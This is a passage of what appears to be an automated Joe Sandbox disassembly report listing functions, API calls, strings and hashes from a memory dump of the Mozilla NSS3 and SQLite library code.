sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA2FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA2FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA2FE83

Part of subcall function 6CA2FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6CA2FEFA
Part of subcall function 6CA2FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6CA2FF3B

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA2FD64, 6CA2FE26
%s at line %d of [%.10s], xrefs: 6CA2FD73, 6CA2FE35
database corruption, xrefs: 6CA2FD6E, 6CA2FE30

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: e63fdf1db8fc5d0deffd216d4278eca3780652da030125edf8efc17900d2e618
Instruction ID: b2d7fbf91088e7e6ce7712180358b87ecd0d88cf27b1ff66ba1c1848fe75151a
Opcode Fuzzy Hash: e63fdf1db8fc5d0deffd216d4278eca3780652da030125edf8efc17900d2e618
Instruction Fuzzy Hash: 9B51A470A002258FDF04CFA9D990AAEB7B1FF48318F19406DE905AB752E735EC94CB90

Function 6CB72F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB72FFD
sqlite3_initialize.NSS3 ref: 6CB73007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB73032
sqlite3_mprintf.NSS3(6CBDAAF9,?), ref: 6CB73073
sqlite3_free.NSS3(?), ref: 6CB730B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CB730C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CB730BB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 0788d94bfa1679c82e148b099270dcb9bb159a4ce582463426bfc641ac6573a0
Instruction ID: 538e71f09f6982719b09d7f102c5f5f210eb53b3de607a0a73854c79c5c812b2
Opcode Fuzzy Hash: 0788d94bfa1679c82e148b099270dcb9bb159a4ce582463426bfc641ac6573a0
Instruction Fuzzy Hash: 0941C471600646AFDB10CF25D844A4AB7B9FF44368F148628EC698BB40E731F995CBE2

Function 6CAB8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CAC124D,00000001), ref: 6CAB8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CAC124D,00000001), ref: 6CAB8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CAC124D,00000001), ref: 6CAB8D73
PR_Unlock.NSS3(?,?,?,?,?,6CAC124D,00000001), ref: 6CAB8D8C

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CAC124D,00000001), ref: 6CAB8DBA

Strings

KRAM, xrefs: 6CAB8CF9
KRAM, xrefs: 6CAB8D3E

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: efc624274389ebbf7d2921c8b2505d0b6c752508da2a866dfa0b8d61018c08c1
Instruction ID: 90d3b2499ac1bdcf6989c5f2ff41ff98d22bf03e5f419237bf6547bd995d8bc8
Opcode Fuzzy Hash: efc624274389ebbf7d2921c8b2505d0b6c752508da2a866dfa0b8d61018c08c1
Instruction Fuzzy Hash: 7321A1B5A046028FCB00EF7CC58465EBBF8FF45318F15896AD99897701EB34D885CB91

Function 6CADACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CADACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CADAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CADAD23

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CADAD39

Strings

C_MessageDecryptFinal, xrefs: 6CADACE1
hSession = 0x%x, xrefs: 6CADACFE, 6CADAD0E
(CK_INVALID_HANDLE), xrefs: 6CADAD1C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 3ef262f4142a26327836609f1a856064e1ce8306f48edc7b85a4ed13e7c78a1c
Instruction ID: 94a2d0d8c0b6d3a00c6337bb696928c86ce611c88726d8ef49313ec8a6f1cd6d
Opcode Fuzzy Hash: 3ef262f4142a26327836609f1a856064e1ce8306f48edc7b85a4ed13e7c78a1c
Instruction Fuzzy Hash: CD2137717001849FDB009F64DD88BBE37B6EB4231EF07402DE409A7A01DF35AD88C692

Function 6CBB0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CBB0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CBB0EFA

Part of subcall function 6CA9AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA9AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBB0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CBB0ED9, 6CBB0EE5, 6CBB0F06, 6CBB0F0B
Aborting, xrefs: 6CBB0EB3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 29565448cd055a1ed5d91381b325812a99b4a114fac89c563a0e01200eebafa6
Instruction ID: e70a49f7889aa210dfd9fe8af0dc159e76a31696c8d12eb1f53b0521ccaa9575
Opcode Fuzzy Hash: 29565448cd055a1ed5d91381b325812a99b4a114fac89c563a0e01200eebafa6
Instruction Fuzzy Hash: 3E01C0B6A00154ABDF11AF64EC458AF3F3DEF4A3A8B004024FD1997712D631EE5486A2

Function 6CB74D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB74DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB74DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB74DCB
%s at line %d of [%.10s], xrefs: 6CB74DDA
misuse, xrefs: 6CB74DD5
API call with %s database connection pointer, xrefs: 6CB74DBD
invalid, xrefs: 6CB74DB8

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 984e9e5e94d0ce11c0a7f39ae73988b3ee2a496247c47c699c6a828fd16c4159
Instruction ID: a2f19c0adea08b39147ff9c83d87671a2f5f85a100d5870ae1441ddb705894dd
Opcode Fuzzy Hash: 984e9e5e94d0ce11c0a7f39ae73988b3ee2a496247c47c699c6a828fd16c4159
Instruction Fuzzy Hash: F0F02415F085F42BE6104025DE14F8633558F0232BF4709A0ED547BA62D316AC988FA2

Function 6CB74DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB74E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB74E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB74E38
%s at line %d of [%.10s], xrefs: 6CB74E47
misuse, xrefs: 6CB74E42
API call with %s database connection pointer, xrefs: 6CB74E2A
invalid, xrefs: 6CB74E25

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 54e6d5b945363aba3869592ac5b0f1af6e14f2744ab65b366771387e5628c103
Instruction ID: a09080be5094a8da60957c059864d981c9c214aba460924438a6aacdb05284d6
Opcode Fuzzy Hash: 54e6d5b945363aba3869592ac5b0f1af6e14f2744ab65b366771387e5628c103
Instruction Fuzzy Hash: 7DF09E14E448D86BE63400219C10F933385C70333BF4B84A0EE1437E82D315A8704FF2

Function 6CAA9FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAAA086
EnterCriticalSection.KERNEL32(?), ref: 6CAAA09B
PR_Unlock.NSS3(?), ref: 6CAAA0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAAA0E9
TlsGetValue.KERNEL32 ref: 6CAAA11B
EnterCriticalSection.KERNEL32(?), ref: 6CAAA12F
PR_Unlock.NSS3(?), ref: 6CAAA148

Part of subcall function 6CAC1A40: PR_Now.NSS3(?,00000000,6CAA28AD,00000000,?,6CABF09A,00000000,6CAA28AD,6CAA93B0,?,6CAA93B0,6CAA28AD,00000000,?,00000000), ref: 6CAC1A65

Part of subcall function 6CAC1940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6CAC4126,?), ref: 6CAC1966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAAA1A3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: e89b6811367699a407a42fc238baa79b950fbf9abf6669cd40423c854e6aa09c
Instruction ID: afdfc6a94e2002ace0cc25beec69ff52f677cc4ef5e93b151082aa4eb467ee97
Opcode Fuzzy Hash: e89b6811367699a407a42fc238baa79b950fbf9abf6669cd40423c854e6aa09c
Instruction Fuzzy Hash: 2C51DA75B007009BEB109FA9DD44AABB7FAAF45308B19442DDC1997701EF31DC8ACB91

Function 6CAE0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CAE1444,?,00000001,?,00000000,00000000,?,?,6CAE1444,?,?,00000000,?,?), ref: 6CAE0CB3

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?,?,6CAE1444,?), ref: 6CAE0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?,?,6CAE1444,?), ref: 6CAE0DEC

Part of subcall function 6CB00F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CAA2AF5,?,?,?,?,?,6CAA0A1B,00000000), ref: 6CB00F1A
Part of subcall function 6CB00F10: malloc.MOZGLUE(00000001), ref: 6CB00F30
Part of subcall function 6CB00F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB00F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?), ref: 6CAE0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CAE1444,?,00000001,?,00000000), ref: 6CAE0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?), ref: 6CAE0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?,?,6CAE1444,?,?,00000000), ref: 6CAE0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAE1444,?,00000001,?,00000000,00000000,?), ref: 6CAE0E79

Part of subcall function 6CAF1560: TlsGetValue.KERNEL32(00000000,?,6CAC0844,?), ref: 6CAF157A
Part of subcall function 6CAF1560: EnterCriticalSection.KERNEL32(?,?,?,6CAC0844,?), ref: 6CAF158F
Part of subcall function 6CAF1560: PR_Unlock.NSS3(?,?,?,?,6CAC0844,?), ref: 6CAF15B2

Part of subcall function 6CABB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAC1397,00000000,?,6CABCF93,5B5F5EC0,00000000,?,6CAC1397,?), ref: 6CABB1CB
Part of subcall function 6CABB1A0: free.MOZGLUE(5B5F5EC0,?,6CABCF93,5B5F5EC0,00000000,?,6CAC1397,?), ref: 6CABB1D2

Part of subcall function 6CAB89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CAB88AE,-00000008), ref: 6CAB8A04
Part of subcall function 6CAB89E0: EnterCriticalSection.KERNEL32(?), ref: 6CAB8A15
Part of subcall function 6CAB89E0: memset.VCRUNTIME140(6CAB88AE,00000000,00000132), ref: 6CAB8A27
Part of subcall function 6CAB89E0: PR_Unlock.NSS3(?), ref: 6CAB8A35

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 99d01a08ac8fddf6aa99326a8e5a6c31ba76abd52ca8a4eabc648849d89bfd38
Instruction ID: f82a88398de436d8f98f332448c6a8bac98862c7b7a54e11db58c3b1cb76e265
Opcode Fuzzy Hash: 99d01a08ac8fddf6aa99326a8e5a6c31ba76abd52ca8a4eabc648849d89bfd38
Instruction Fuzzy Hash: F25195B5E002415FEB009F64ED81ABF37B8DF49218F190064ED1997712EB31ED99A7E2

Function 6CA96E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CA96ED8
sqlite3_value_text.NSS3(?,?), ref: 6CA96EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CA96FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CA96FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CA96FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CA97010
sqlite3_value_blob.NSS3(?,?), ref: 6CA9701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CA97052

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 91155e1de5a5cd712f67c60f327835c36118645613fefe7b9f6cfb1e842d3f79
Instruction ID: 2491a79428b3d9aceb634b3b9941a37e65fe4236ac36e2e589dec0bdd55e427a
Opcode Fuzzy Hash: 91155e1de5a5cd712f67c60f327835c36118645613fefe7b9f6cfb1e842d3f79
Instruction Fuzzy Hash: 556118B1E252498FDB40CF68C9427EEB7F2AF45308F284165D416EBB50E7369C59CBA0

Function 6CB08F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CB07313), ref: 6CB08FBB

Part of subcall function 6CB007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAA8298,?,?,?,6CA9FCE5,?), ref: 6CB007BF
Part of subcall function 6CB007B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB007E6
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB0081B
Part of subcall function 6CB007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB00825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CB07313), ref: 6CB09012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CB07313), ref: 6CB0903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CB07313), ref: 6CB0909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CB07313), ref: 6CB090DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CB07313), ref: 6CB090F1

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CB07313), ref: 6CB0906B

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CB07313), ref: 6CB09128

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 1985e5a96a391d29bc49d82bee694610c9204bce2ba6037acfc2e8bedb02518f
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: F6519271F002419FEB109F6ADC44B26BBF9EF44358F154429E915D7B62EB72E804CB92

Function 6CAB9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6CAB8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6CAC0715), ref: 6CAB8859
Part of subcall function 6CAB8850: PR_NewLock.NSS3 ref: 6CAB8874
Part of subcall function 6CAB8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6CAB888D

PR_NewLock.NSS3 ref: 6CAB9CAD

Part of subcall function 6CB698D0: calloc.MOZGLUE(00000001,00000084,6CA90936,00000001,?,6CA9102C), ref: 6CB698E5

